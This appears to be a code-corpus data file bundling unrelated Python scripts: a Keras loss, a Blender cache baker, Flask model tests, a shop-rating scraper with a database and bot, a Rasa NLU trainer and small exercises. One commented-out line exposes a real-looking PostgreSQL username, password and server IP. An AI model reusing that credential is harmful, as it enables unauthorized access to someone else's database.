error occured in losses.py')\n else:\n return first_loss\n\n\ndef distance_categorical_crossentropy(target, output, from_logits=False):\n \"\"\"Categorical crossentropy between an output tensor and a target tensor.\n\n # Arguments\n target: A tensor of the same shape as `output`.\n output: A tensor resulting from a softmax\n (unless `from_logits` is True, in which\n case `output` is expected to be the logits).\n from_logits: Boolean, whether `output` is the\n result of a softmax, or is a tensor of logits.\n\n # Returns\n Output tensor.\n \"\"\"\n # Note: tf.nn.softmax_cross_entropy_with_logits\n # expects logits, Keras expects probabilities.\n if not from_logits:\n # scale preds so that the class probas of each sample sum to 1\n output /= tf.reduce_sum(output, #按照行的维度求和\n len(output.get_shape()) - 1,\n True) #将每行中每个元素映射到 0-1 上, 使得每行总和为 1\n # manual computation of crossentropy\n _epsilon = tf.convert_to_tensor(epsilon(), output.dtype.base_dtype) # epsilion() : return _EPSILON = 1e-7,然后将其转换为tensor\n output = tf.clip_by_value(output, _epsilon, 1. - _epsilon) # tf.clip_by_value(A, min, max):输入一个张量A,把A中的每一个元素的值都压缩在min和max之间。小于min的让它等于min,大于max的元素的值等于max。\n pos_true = tf.argmax(target,1) #获取每行最大值的位置索引,即最终预测值\n pos_pred = tf.argmax(output,1)\n distance = tf.abs(pos_true - pos_pred)\n pos_true = pos_true/50 - 1\n pos_pred = pos_pred/50 - 1\n new_pos_true = 0.5 * (tf.log((1 + pos_true+ 0.01)/(1-pos_true + 0.01)))# artanhx函数 范围:[-2.62165,2.62165]\n new_pos_pred = 0.5 * (tf.log((1 + pos_pred+ 0.01)/(1-pos_pred + 0.01)))\n new_distance = tf.abs(new_pos_true - new_pos_pred)\n\n\n return - tf.reduce_sum((target * tf.log(output) + (1 - target) * tf.log(1-output)) * (new_distance + 1),\n len(output.get_shape()) - 1)\n else:\n return tf.nn.softmax_cross_entropy_with_logits(labels=target,\n logits=output)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"kerasPredict/model/lstmTimeSeries.py","file_name":"lstmTimeSeries.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622538628","text":"import bpy\n############################\n## BAKE DYNAMICS SHORTHAIR ##\n############################\npersonaje='papa'\n\nprint('\\n\\nSTART SHORTHAIR DYNAMICS SCRIPT\\n\\n')\nselo=bpy.context.selected_objects\n\ndef override(point_cache,object):\n for window in bpy.context.window_manager.windows:\n screen = window.screen\n scene=bpy.context.scene\n blend_sdata=bpy.data\n\n for area in screen.areas:\n if area.type == 'VIEW_3D':\n for region in area.regions:\n if region.type == 'WINDOW':\n override = {'active_object': object,'blend_data':blend_sdata,'scene':scene,'window': window, 'screen': screen, 'area': area,'region':region,'point_cache':point_cache}\n break\n for o in override:\n print( o+' '+str(override[o]))\n return override\n\nscene=bpy.context.scene\n\ndef finder(what,where):\n fw=where.lower()\n if what.lower().find(fw):\n return True\n else:\n return False\npapa_meshes=['cpete','cabello.izq','cabello.der']\n\nx=personaje+'_meshes'\n\nfor obj in selo:\n if obj.type=='MESH' and obj.name in dict:\n bpy.context.scene.objects.active=obj\n \n ## If object is mesh and has particle systems :\n if len(obj.particle_systems.keys())>0:\n partsystems=len(obj.particle_systems.keys())\n part=obj.particle_systems\n \n ## Looks inside all particle systems in the object\n for ps in range(partsystems):\n print(obj.name+\" has part system \"+part[ps].name)\n part.active=part[ps]\n print(part.active.point_cache)\n #context={'scene': scene, 'active_object': object,'point_cache':part.active.point_cache}\n #bpy.ops.ptcache.bake(context,bake=True)\n bpy.ops.ptcache.bake(override(part.active.point_cache,obj),bake=True)\n print('baked cache for '+part[ps].name)\n #time.sleep(1)\n #print(\"point cache done for \"+part[ps].name)","sub_path":"scripts/Bakes/pointcache_baker.py","file_name":"pointcache_baker.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604675214","text":"import unittest\nfrom app.models import Tag, Post\nfrom app import db, create_app\n\n\nclass TagModelTestCase(unittest.TestCase):\n\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_tag_setter(self):\n t = Tag(name='cat')\n db.session.add(t)\n db.session.commit()\n self.assertTrue(Tag.query.filter_by(name='cat') is not None)\n\n def test_is_existed(self):\n self.assertFalse(Tag.is_existed('dog'))\n t = Tag(name='dog')\n db.session.add(t)\n db.session.commit()\n self.assertTrue(Tag.is_existed('dog'))\n\n def test_add_tag_to_post(self):\n post = Post(title=\"test\")\n tag = Tag(name=\"test\")\n post.tag.append(tag)\n db.session.add(post)\n db.session.commit()\n self.assertTrue(Post.query.filter_by(title=\"test\").first().tags != [])\n","sub_path":"tests/test_tag_model.py","file_name":"test_tag_model.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440549545","text":"import time\nfrom datetime import datetime\n\nfrom sqlalchemy import Column, Integer, String, create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom lequeshop_parser import lequeshop_parser\nfrom lequeshop_response import send_message_bot\n\n# engine = create_engine('postgresql+psycopg2://freefuck:Lm83sw.fhVp*@142.93.169.156/freefuck')\nengine = create_engine(\"sqlite:///top_database.db\")\n\nengine.connect()\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nBase = declarative_base()\n\n\nclass Shop(Base):\n __tablename__ = 'shops'\n id = Column(Integer, primary_key=True)\n name = Column(String, unique=True)\n rating = Column(Integer)\n count = Column(Integer)\n\n\nclass Catalog(Base):\n __tablename__ = 'catalogs'\n id = Column(Integer, primary_key=True)\n name = Column(String, unique=True)\n rating = Column(Integer)\n count = Column(Integer)\n\n\nBase.metadata.create_all(engine)\n\nfirst_shop_on_database = session.query(Shop).filter_by(rating=1).first()\n\n\ndef database_lequeshop(pause=10):\n lequeshop_rating = {r['rating']: s[8:] for s, r in lequeshop_parser().items()}\n global first_shop_on_database\n\n first_shop_on_lequeshop = lequeshop_rating[1]\n\n if first_shop_on_lequeshop != first_shop_on_database.name:\n\n for r, s in lequeshop_rating.items():\n unique_shop = session.query(Shop).filter_by(name=s).first()\n\n if unique_shop is None:\n session.add(Shop(name=s, rating=r, count=0))\n print(datetime.now().strftime('%H:%M:%S'), 'ADD', s)\n\n try:\n if unique_shop.rating != 1 and r == 1:\n unique_shop.count += 1\n if unique_shop.rating != r:\n unique_shop.rating = r\n except:\n pass\n\n print(datetime.now().strftime('%H:%M:%S'), 'CHANGE', lequeshop_rating[1])\n\n data = '\\n'.join([' '.join([str(r), s]) for r, s in lequeshop_rating.items()][:9])\n send_message_bot(384244888, data)\n\n first_shop_on_database = session.query(Shop).filter_by(rating=1).first()\n\n session.commit()\n else:\n time.sleep(pause)\n","sub_path":"PycharmProjects/LequeShopTelebot/lequeshop_database.py","file_name":"lequeshop_database.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"249338535","text":"class Book_Store:\n \"\"\"In class we define instance variable which can be accessed\n inside of instance method\"\"\"\n\n def __init__(self, name, days, cate='no catg'):\n self.bookName = name\n self.Noofdays = days\n self.bookCategory = cate\n\n def __str__(self):\n return f'\\n {self.__dict__}'\n\n def __repr__(self):\n return str(self)\n\n def book_rent(self):\n \"\"\"In this instance method we give prices before the alter new prices\"\"\"\n if self.bookCategory == 'no catg':\n print(\"Total charge on book Rs:\", self.Noofdays * 1)\n\n elif self.bookCategory == 'regular' or self.bookCategory == 'fiction' or self.bookCategory == 'novel':\n if self.bookCategory == 'regular':\n print(\"Total charge on book Rs:\", self.Noofdays * 1.5)\n\n elif self.bookCategory == 'fiction':\n print(\"Total charge on book Rs:\", self.Noofdays * 3)\n\n else:\n print(\"Total charge on book Rs:\", self.Noofdays * 1.5)\n\n def book_rent_after_alter(self):\n \"\"\"In this instance method we give new prices for rent\"\"\"\n if self.bookCategory == 'regular' or self.bookCategory == 'novel':\n if self.bookCategory == 'regular':\n if self.Noofdays == 2:\n print(\"Total new charge on book Rs:\", self.Noofdays * 1)\n elif self.Noofdays > 2:\n print(\"Total new charge on book Rs:\", self.Noofdays * 1.5)\n elif self.Noofdays < 2:\n print(\"Total new charge on book Rs:\", self.Noofdays * 2)\n\n elif self.bookCategory == 'novel':\n if self.Noofdays >= 3:\n print(\"Total new charge on book Rs:\", self.Noofdays * 1.5)\n elif self.Noofdays < 3:\n print(\"Total new charge on book Rs:\", self.Noofdays * 4.5)\n\n else:\n print(\"please provide correct category..!\")\n\n\nb = Book_Store\nb1 = Book_Store(name=\"aaaa\", days=2,cate='regular')\nprint(b1)\nb.book_rent(b1)\nb.book_rent_after_alter(b1)\n\n","sub_path":"Book_on_rent.py","file_name":"Book_on_rent.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"63555142","text":"# Zadanie 1. Utwórz plik na pulpicie zawierający listę ok. 20 cytatów.\n# Każdy cytat powinen się znaleźć w nowej linii. Utwórz funkcję, która losuje i wyświetla w sposób ciekawy cytat na dziś. Np. można wyświetlić tak:\n\n# import random\n#\n# with open(input('Podaj swoj plik z cytatami z rozszerzeniem txt: ')) as fopen:\n# quotes = fopen.readlines()\n#\n# quote = random.choice(quotes).strip()\n# width = len(quote) * 2\n#\n# print('Quote of the day: \\n')\n# print(width * '*')\n# print(quote.center(width))\n# print(width * '*')\n\n#------------------------\n\nimport random\n\n\n# funkcja do pobrania tekstu, zwraca liste\ndef get_quotes():\n while True:\n try:\n filename = input('You filename: ')\n with open(filename) as fopen:\n quotes = fopen.readlines()\n except FileNotFoundError as err:\n print('No such file: ', err)\n continue\n return quotes\n\n\n# funkcja wyświetlająca\ndef show(content):\n quote = random.choice(content).strip()\n quote = quote.split(' - ')\n width = len(quote[0]) * 2\n\n print('Quote of the day: \\n')\n print(width * '*')\n print(quote[0].center(width))\n print(quote[1].rjust(width))\n print(width * '*')\n\n\n# main code\n\nquotes_list = get_quotes()\nshow(quotes_list)","sub_path":"09_exceptions/07/exceptions_07.py","file_name":"exceptions_07.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461534265","text":"import mysql.connector\n\nclass Coneccion:\n\n def __init__(self,ip,us,pa,db):\n try:\n self.conn = mysql.connector.connect(host=ip, user=us, passwd=pa, db=db)\n except:\n print(\"error en coneccion(construcctor)\")\n\n def ejecutar(self, query):\n try:\n print(query)\n cursor = self.conn.cursor()\n cursor.execute(query)\n rs = cursor.fetchall()\n cursor.close()\n return rs\n except:\n print(\"Error en Connecion(ejecutarSelect)\")\n\n def ejecutarInsert(self,query):\n try:\n cursor = self.conn.cursor()\n cursor.execute(query)\n self.conn.commit()\n except:\n print(\"Error en Connecion(ejecutarInsert)\")\n","sub_path":"Manejador Bd/db/Conexion.py","file_name":"Conexion.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47049309","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n# from rasa_nlu.converters import load_data\nfrom rasa_nlu.training_data import load_data\nfrom db_base import session\nfrom rasa_nlu.config import RasaNLUModelConfig\n# from rasa_nlu.config import RasaNLUConfig\nfrom rasa_nlu.model import Trainer, Metadata, Interpreter\nfrom rasa_nlu import config\n\n\ndef train(data, config_file, model_dir):\n training_data = load_data(data)\n configuration = config.load(config_file)\n trainer = Trainer(configuration)\n trainer.train(training_data)\n model_directory = trainer.persist(model_dir, fixed_model_name='chat')\n\n\ndef run():\n interpreter = Interpreter.load('./models/nlu/default/chat')\n data = interpreter.parse('wants to eat indian in bangalore')\n print(data)\n\n params = {}\n for ent in data[\"entities\"]:\n params[ent[\"entity\"]] = ent[\"value\"]\n print(params)\n\n query = \"select Restaurant_Name FROM restaurant\"\n if len(params) != 0:\n filters = [\"{}='{}'\".format(k, v) for k, v in params.items()]\n print(filters)\n conditions = \" and \".join(filters)\n print(conditions)\n query = \" WHERE \".join([query, conditions])\n print(query)\n a = session.execute(query)\n result_set = a.fetchall()\n print(result_set)\n res =[]\n for data in result_set:\n res = data['name']\n print(res)\n responses = [\n \"I'm sorry :( I couldn't find anything like that\"\n ,\n \"what about {}?\"\n ,\n \"{} is one option, but I know others too :)\"\n ]\n print(len(result_set))\n index = min(len(result_set), len(responses) - 1)\n print(responses[index].format(res))\n\nif __name__ == '__main__':\n train('./data/nlu_data.md', './config/config.yml', './models/nlu')\n run()\n\n# rasa-nlu-trainer -v \n# python nlu_modle.py\n","sub_path":"rasa_chatbot/nlu_model.py","file_name":"nlu_model.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503871246","text":"# coding: utf-8\n'''\nCreated on 2018/08/18\n\n@author: hsekia\n'''\nimport os\nimport cv2\nimport hashlib\nimport numpy as np\n\ndef imread(filename, flags=cv2.IMREAD_COLOR, dtype=np.uint8):\n \"\"\"\n read image.(for multi-byte char file path)\n \"\"\"\n try:\n n = np.fromfile(filename, dtype)\n img = cv2.imdecode(n, flags)\n return img\n except Exception as e:\n print(e)\n return None\n\ndef find_all_files(directory):\n \"\"\"\n find all filename recursively\n \"\"\"\n for root, _, files in os.walk(directory):\n for file in files:\n yield os.path.join(root, file)\n\ndef get_file_hash(filename):\n \"\"\"\n get md5 hash of file\n \"\"\"\n with open(filename, 'rb') as f:\n checksum = hashlib.md5(f.read()).hexdigest()\n return checksum\n","sub_path":"facedetector/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"602218824","text":"import numpy as np\r\nfrom models import ModelBaseClass\r\nfrom utilities import BFGSAlgo,loadConfigWithName\r\n\r\n\r\n# Remember that for logistic model, the label yi is either 0 or 1, not -1 or 1!\r\n# 使用SGD或拟牛顿法优化\r\n# 使用拟牛顿法优化时有可能遇到数值问题……以后再调试了\r\nclass Logistic(ModelBaseClass):\r\n def __init__(self):\r\n self.w = None\r\n\r\n def f(self,w,features,labels):\r\n wxi = np.sum(w.reshape(-1, ) * features, axis=1)\r\n resultBlock = labels * wxi - np.log(1 + np.exp(wxi))\r\n assert len(resultBlock.shape)==1\r\n result = np.sum(resultBlock)\r\n return -1 * result\r\n\r\n def g(self,w,features,labels):\r\n # refer to the note on page 117\r\n YiXij = labels.reshape(-1, 1) * features\r\n WjXij = w * features\r\n expWXi = np.exp(np.sum(WjXij, axis=1)).reshape(-1, 1)\r\n rightSide = (features * expWXi) / (1 + expWXi)\r\n beforeSummation = rightSide - YiXij # for finding minimum, need to minus the result\r\n result = np.sum(beforeSummation, axis=0)\r\n return result\r\n\r\n\r\n\r\n def train(self, features, labels, *args, **dicts):\r\n learningRate=float(loadConfigWithName(\"LogisticConfig\",\"learningRate\"))\r\n batchSize=int(loadConfigWithName(\"LogisticConfig\",\"batchSize\"))\r\n batchNum=features.shape[0]//batchSize+1 if features.shape[0]%batchSize!=0 else features.shape[0]//batchSize\r\n threshhold=float(loadConfigWithName(\"LogisticConfig\",\"threshold\"))\r\n self.useNewton=int(loadConfigWithName(\"LogisticConfig\",\"useNewton\"))\r\n\r\n #SGD\r\n if self.useNewton!=1:\r\n w=np.random.rand(features.shape[1])\r\n while True:\r\n if np.linalg.norm(self.g(w,features,labels))= 0.5 else predictResult.append(0)\r\n return np.array(predictResult)\r\n\r\n def loadPara(self):\r\n self.w = np.array(self.loadJson())\r\n","sub_path":"models/Logistic.py","file_name":"Logistic.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298711223","text":"start_menu = int(input())\nfor izxc in range(start_menu):\n k = int(input())\n arr = list(map(int,input().split()))\n arr_chetniy = list()\n arr_nechetniy = list()\n last_arr = list()\n for i in arr:\n if(i % 2 ==0): arr_chetniy.append(i)\n else: arr_nechetniy.append(i)\n \n for i in range(len(arr_nechetniy)):\n last_arr.append(arr_nechetniy[i])\n for i in range(len(arr_chetniy)):\n last_arr.append(arr_chetniy[i])\n print(*last_arr)","sub_path":"after midterm/week13/codeforces/avg_high.py","file_name":"avg_high.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575903270","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport time\n\nimport torch\nimport torch.nn as nn\nfrom sklearn import metrics\nfrom Project import *\nfrom build_graph import read_label_list\nfrom models.gcn import GCN, GraphConvolution\nfrom models.mlp import MLP\nfrom utils import *\nfrom build_vector_predict import generate_predict_adj\n\n\ndef trans2tensor(xy_info):\n features, y_train, y_val, y_test, train_mask, y_train = xy_info\n t_features = torch.from_numpy(features.astype(np.float32))\n t_y_train = torch.from_numpy(y_train)\n t_y_val = torch.from_numpy(y_val)\n t_y_test = torch.from_numpy(y_test)\n t_train_mask = torch.from_numpy(train_mask.astype(np.float32))\n tm_train_mask = torch.transpose(torch.unsqueeze(t_train_mask, 0), 1, 0).repeat(1, y_train.shape[1])\n return t_features, t_y_train, t_y_val, t_y_test, t_train_mask, tm_train_mask\n\n\ndef evaluate(gcn, features, labels, mask, criterion):\n t_test = time.time()\n gcn.eval()\n with torch.no_grad():\n out = gcn(features)\n t_mask = torch.from_numpy(np.array(mask * 1., dtype=np.float32))\n tm_mask = torch.transpose(torch.unsqueeze(t_mask, 0), 1, 0).repeat(1, labels.shape[1])\n loss = criterion(out * tm_mask, torch.max(labels, 1)[1])\n prediction = torch.max(out, 1)[1]\n acc = ((prediction == torch.max(labels, 1)[1]).float() * t_mask).sum().item() / t_mask.sum().item()\n\n return loss.numpy(), acc, prediction.numpy(), labels.numpy(), (time.time() - t_test)\n\n\ndef print_test_result(test_mask, prediction, labels):\n test_pred = []\n test_labels = []\n for i in range(len(test_mask)):\n if test_mask[i]:\n test_pred.append(prediction[i])\n test_labels.append(np.argmax(labels[i]))\n\n print_log(\"Test Precision, Recall and F1-Score...\")\n print_log(metrics.classification_report(test_labels, test_pred, digits=4))\n label_list = read_label_list()\n cnt = 0\n for label in label_list:\n print_log(str(cnt) + '\\t' + label)\n cnt += 1\n print_log(\"Macro average Test Precision, Recall and F1-Score...\")\n print_log(metrics.precision_recall_fscore_support(test_labels, test_pred, average='macro'))\n print_log(\"Micro average Test Precision, Recall and F1-Score...\")\n print_log(metrics.precision_recall_fscore_support(test_labels, test_pred, average='micro'))\n\n\ndef train(gcn, xy_info, val_mask, criterion):\n val_losses = []\n t_features, t_y_train, t_y_val, t_y_test, t_train_mask, tm_train_mask = \\\n trans2tensor(xy_info)\n\n optimizer = torch.optim.Adam(gcn.parameters(), lr=train_config.learning_rate)\n\n for epoch in range(train_config.epochs):\n t = time.time()\n # Forward pass\n out = gcn(t_features)\n loss = criterion(out * tm_train_mask, torch.max(t_y_train, 1)[1])\n acc = ((torch.max(out, 1)[1] == torch.max(t_y_train, 1)[1])\n .float() * t_train_mask).sum().item() / t_train_mask.sum().item() # 正确的数目/总数目\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # Validation\n val_loss, val_acc, pred, labels, duration = evaluate(gcn, t_features, t_y_val, val_mask, criterion)\n val_losses.append(val_loss)\n\n print_log(\"Epoch: {:.0f}, train_loss= {:.5f}, train_acc= {:.5f}, val_loss= {:.5f}, val_acc= {:.5f}, \"\n \"time= {:.5f}\".format(epoch + 1, loss, acc, val_loss, val_acc, time.time() - t))\n\n if epoch > train_config.early_stopping and val_losses[-1] > np.mean(\n val_losses[-(train_config.early_stopping + 1):-1]):\n print_log(\"Early stopping...\")\n break\n # torch.save({\n # 'epoch': epoch,\n # 'model_state_dict': gcn.layer2.state_dict(),\n # 'optimizer_state_dict': optimizer.state_dict(),\n # 'loss': loss,\n # }, project.experiment_dir / 'checkpoint.ck')\n print_log(\"Optimization Finished!\")\n return t_features, t_y_test\n\n\n# doc and word embeddings\ndef store_word_doc_vectors(gcn, train_size, test_size, adj):\n embedding_t = gcn.layer1.embedding\n with open(project.experiment_dir / \"embedding_t.pkl\", 'wb') as f:\n pkl.dump(embedding_t, f)\n tmp = embedding_t.numpy()\n\n word_embeddings = tmp[train_size: adj.shape[0] - test_size]\n train_doc_embeddings = tmp[:train_size] # include val docs\n test_doc_embeddings = tmp[adj.shape[0] - test_size:]\n\n with open(project.vocab_path / (project.dataset + '.txt'), 'r', encoding='utf-8') as f:\n words = f.readlines()\n\n vocab_size = len(words)\n word_vectors = []\n for i in range(vocab_size):\n word = words[i].strip()\n word_vector = word_embeddings[i]\n word_vector_str = ' '.join([str(x) for x in word_vector])\n word_vectors.append(word + ' ' + word_vector_str)\n word_embeddings_str = '\\n'.join(word_vectors)\n with open(project.experiment_dir / 'word_vectors.txt', 'w', encoding='utf-8') as f:\n f.write(word_embeddings_str)\n\n doc_vectors = []\n doc_id = 0\n for i in range(train_size):\n doc_vector = train_doc_embeddings[i]\n doc_vector_str = ' '.join([str(x) for x in doc_vector])\n doc_vectors.append('doc_' + str(doc_id) + ' ' + doc_vector_str)\n doc_id += 1\n\n for i in range(test_size):\n doc_vector = test_doc_embeddings[i]\n doc_vector_str = ' '.join([str(x) for x in doc_vector])\n doc_vectors.append('doc_' + str(doc_id) + ' ' + doc_vector_str)\n doc_id += 1\n\n doc_embeddings_str = '\\n'.join(doc_vectors)\n with open(project.experiment_dir / 'doc_vectors.txt', 'w', encoding='utf-8') as f:\n f.write(doc_embeddings_str)\n\n\ndef main():\n seed = 2021\n np.random.seed(seed)\n torch.manual_seed(seed)\n\n # Load data\n adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, train_size, test_size = load_corpus(\n )\n\n features = np.identity(features.shape[0])\n\n # features = preprocess_features(features)\n\n mlp = MLP(input_dim=features.shape[0], dropout_rate=0, num_classes=y_train.shape[1])\n\n criterion = nn.CrossEntropyLoss()\n t_features, t_y_test = train(mlp, [features, y_train, y_val, y_test, train_mask, y_train], val_mask, criterion)\n\n test_loss, test_acc, pred, labels, test_duration = evaluate(mlp, t_features, t_y_test, test_mask, criterion)\n print_log(\"Test set results: \\n\\t loss= {:.5f}, accuracy= {:.5f}, time= {:.5f}\"\n .format(test_loss, test_acc, test_duration))\n print_test_result(test_mask, pred, labels)\n # store_word_doc_vectors(mlp, train_size, test_size, adj)\n print_log('当前实验目录为:' + str(project.experiment_dir))\n\n\ndef predict():\n print_log(\"Generating prediction adj data\")\n predict_adj_list = generate_predict_adj()\n # Load data\n with open(project.label_path / (project.dataset + '.txt'), 'r', encoding='utf-8') as f:\n f.readlines()\n with open(project.experiment_dir / \"embedding_t.pkl\", 'rb') as f:\n if sys.version_info > (3, 0):\n embedding_t = pkl.load(f, encoding='latin1')\n else:\n embedding_t = pkl.load(f)\n label_list = read_label_list()\n layer2 = GraphConvolution(200, len(label_list), support=torch.tensor([predict_adj_list], dtype=torch.float32),\n dropout_rate=0)\n checkpoint = torch.load(project.experiment_dir / 'checkpoint.ck')\n layer2.load_state_dict(checkpoint['model_state_dict'])\n layer2.eval()\n with torch.no_grad():\n out = layer2(embedding_t)\n predictions = torch.max(out, 1)[1]\n for index in predictions:\n print(label_list[index])\n\n\nif __name__ == '__main__':\n main()\n # predict()\n","sub_path":"train_linear.py","file_name":"train_linear.py","file_ext":"py","file_size_in_byte":7719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"613805156","text":"from PageObjectLibrary import PageObject\nfrom robot.api import logger as log\nfrom robot.utils import asserts\nfrom Common_Utils import Utils\nimport Messages\n\n\nclass StartedPage(PageObject):\n PAGE_URL = \"/getting-started\"\n Utils = Utils()\n selectors = Utils.get_selectors_from_obj_file(\"obj_repo_started_page.py\")\n\n def __init__(self):\n PageObject.__init__(self)\n self.utils = Utils()\n\n def _is_current_page(self):\n # this site uses the same title for many pages,\n # so we can't rely on the default implementation\n # of this function. Instead, we'll check the page\n # location, and raise an appropriate error if\n # we are not on the correct page\n location = self.selib.get_location()\n log.info(\"location is {0}\".format(location))\n if not (self.PAGE_URL in location):\n message = \"Expected location to end with \" + \\\n self.PAGE_URL + \" but it did not\"\n raise Exception(message)\n return True\n\n def verify_started_page(self):\n\n header = self.selib.get_webelement(self.selectors['page_header']).text\n sub_header = self.selib.find_element(self.selectors['sub_header']).text\n log.info(\"Heading of page is \\\"{0} \\\" \".format(header))\n log.info(\"Heading of page is \\\"{0} \\\" \".format(sub_header))\n asserts.assert_equal(\"Getting Started\", header, \"The heading of getting started page does not match\")\n asserts.assert_equal(Messages.SUB_HEADING_MESSAGE, sub_header, \"The sub heading of getting started page does \"\n \"not match\")\n return self\n \n def verify_tab_options(self, options):\n log.info(options)\n log.info(type(options))\n options_list = []\n options_list_temp = options.split(\"Getting Started \")\n options_list.append(\"Getting Started\")\n log.info(options_list_temp)\n options_list.extend(options_list_temp[1].split(\" \"))\n log.info(\"options_list is {0}\".format(options_list))\n # log.info(options_list_temp)\n for tab_name in options_list:\n locator_name = self.selectors['tab_option']\n log.info(\"locator_name is {0}\".format(locator_name))\n if tab_name == \"Getting Started\":\n\n locator_name = locator_name.replace('{n}', 'getting-started')\n else:\n locator_name = locator_name.replace('{n}', str(tab_name).lower())\n\n log.info(locator_name)\n tab_found = self.utils.verify_element_visible(locator_name)\n asserts.assert_true(tab_found, \"tab %s not found\" % tab_found)\n return self\n\n\n","sub_path":"Modules/StartedPage.py","file_name":"StartedPage.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"125291426","text":"from random import randint\nn = randint(0,10)\nj = int(input('Pensei num número de 0 até 10, consegue adivinhá-lo? '))\nc = 1\nwhile n != j:\n if j > n:\n c+=1\n j = int(input('Menos... Tente novamente!\\nQual seu palpite? '))\n if j < n:\n c+=1\n j = int(input('Mais... Tente novamente!\\nQual seu palpite? '))\nprint(f'Você acertou com {c} tentativas. PARABÉNS!!!')","sub_path":"Exercicios-Python/exercicios-curso-em-video/d058.py","file_name":"d058.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466407858","text":"''' A Confederação Nacional de Natação precisa de um programa\r\nque leia o ano de nascimento de um atleta e mostre sua categoria, de acordo com a idade:\r\n\r\n– Até 9 anos: MIRIM\r\n\r\n– Até 14 anos: INFANTIL\r\n\r\n– Até 19 anos: JÚNIOR\r\n\r\n– Até 25 anos: SÊNIOR\r\n\r\n– Acima de 25 anos: MASTER'''\r\n\r\n# Módulo para buscar o ano atual\r\nfrom datetime import date\r\n\r\n# Recebendo o ano atual na var\r\natual = date.today().year\r\n\r\n# Variável criada para solicitar o ano de nascimento\r\nnasc = int(input('Digite o ano de nascimento: '))\r\n\r\nidade = atual - nasc\r\n\r\nprint('O atleta tem {} anos.'.format(idade))\r\n\r\nif idade <= 9:\r\n print('Classificação: MIRIM!')\r\nelif idade > 9 and idade <= 14:\r\n print('Classificação: INFANTIL!')\r\nelif idade > 14 and idade <= 19:\r\n print('Classificação: JÚNIOR!')\r\nelif idade > 19 and idade <= 25:\r\n print('Classificação: SÊNIOR!')\r\nelse:\r\n print('Classificação: MASTER!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ex41.py","file_name":"ex41.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401686808","text":"#!/usr/bin/python3.4\n\nfrom scan_access_points import start_access_point_scanners,stop_access_point_scanners\nfrom exit_event import get_exit_event\nimport link_hubs\nimport wifi\nfrom link_hub_gui import screen_lock\nimport link_hub_gui\nimport curses\nimport threading\nimport logging\nfrom subprocess import check_output\n\ndef main(stdscr):\n\tlogging.basicConfig(filename=r'./logs/manufacturing_link_hub.log',filemode='w', level=logging.DEBUG)\n\tlogging.info('start')\n\n\tlogger = logging.getLogger('main ')\n\n\t# Clear screen\n\tstdscr.clear()\n\tcurses.cbreak(10)\n\tcurses.noecho()\n\n\tbegin_x = 0; begin_y = 10\n\theight = 10; width = 120\n\tlink_hubs_win = curses.newwin(height, width, begin_y, begin_x)\n\tmenu_win = curses.newwin(2, width, begin_y+height, begin_x)\n\tselection_win = curses.newwin(30, width, 2+begin_y+height, begin_x)\n\n\tlink_hub_gui.set_selection_win(selection_win)\n\tlink_hub_gui.set_menu_win(menu_win)\n\t\n\tlogger.debug('starting menu handler')\n\tstop_menu_event = link_hub_gui.start_key_thread(link_hubs_win)\n\n\tlogger.debug('starting wifi')\n\tstop_wifi_event = wifi.run()\n\n\tlogger.debug('starting access point scanners')\n\tchange_event = link_hubs.modified()\n\tstart_access_point_scanners()\n\t\n\tlogger.debug('displaying initial menu')\n\tlink_hubs.hubs_display(link_hubs_win)\n\tlink_hub_gui.push_menu(link_hubs.menu_handler)\n\n\texit_event = get_exit_event()\n\tlogger.debug('starting loop')\n\tmodified_event = link_hubs.modified()\n\twhile (not exit_event.is_set()):\n\t\tlogger.debug('waiting for event')\n\t\t\n\t\tmodified_event.wait()\n\t\tmodified_event.clear()\n\t\tlogger.debug('updating 